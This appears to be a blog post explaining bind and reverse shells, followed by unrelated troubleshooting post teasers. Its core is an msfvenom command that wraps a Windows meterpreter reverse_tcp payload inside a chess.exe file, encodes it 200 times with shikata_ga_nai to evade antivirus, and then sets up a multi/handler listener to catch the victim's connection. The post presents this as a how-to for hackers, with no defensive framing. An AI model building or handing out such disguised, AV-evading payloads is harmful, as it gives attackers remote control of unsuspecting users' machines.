msfvenom creating a reverse shell and evading payload from av



There are two types of shell namely bind and reverse shell. Bind shell creates a new service  and attacker connect to this service.

Reverse shell on the other hand, is triggered by the user while an attacker runs some listener and target machine.

msfvenom allows hacker to create / re-create a payload and hide it from AV detection.


The command below, hides our payload / attack using reverse_tcp using an encoder called shikata_ga_nai into a file called chess.exe.



msf > msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -x /usr/share/chess.exe -e x86/shikata_ga_nai -i 200 -f exe >chess.exe

To listen to any victim, we will issue the following commands :-


msf >use exploit/multi/handler

 msf > set payload windows/meterpreter/reverse_tcp





Comments

Post a Comment

Popular posts from this blog

gemini cli getting file not defined error

Image
 While trying to run gemini cli on my windows linux subsystem, i bump into this error here - "/Roaming/npm/node_modules/@google/gemini-cli/node_modules/undici/lib/web/webidl/index.js:512 webidl.is.File = webidl.util.MakeTypeAssertion(File)"  "ReferenceError: File is not defined" In Node.js, there’s no built-in File (until very recent Node 20+ with experimental WHATWG APIs). So, unless polyfilled, File is undefined, leading to the ReferenceError. And to resolve this, I had to upgrade to node 22 (might work for node 20) and then I was able to run it.
Read more

NodeJS: Error: spawn EINVAL in window for node version 20.20 and 18.20

Encounter this issue when running autorest (that uses nodejs).  I am using node version:  v18.20.2 After i revert to use node v18.12.0, then i was able to get my app to run without this error. Since i am working with Azure devops yaml, i was able to use the following to resolve my issue.  - task : NodeTool@0   inputs :     versionSource : 'spec'     versionSpec : '18.18.0'
Read more

vllm : Failed to infer device type

Trying to run vllm without gpu will typicaly lands you into this issue. To resolve this issue: we can use set these both. Setting one does not work for me. So i had to configure both settings below:- 1.  environment variable CUDA_VISIBLE_DEVICES = "" 2. in the command line, change to use device cpu and remove  tensor-parallel-size. For example, python3 -m vllm.entrypoints.openai.api_server --port 8080 --model deepseek-ai/DeepSeek-R1 --device cpu --trust-remote-code --max-model-len 4096" References https://docs.vllm.ai/en/latest/getting_started/troubleshooting.html#failed-to-infer-device-type
Read more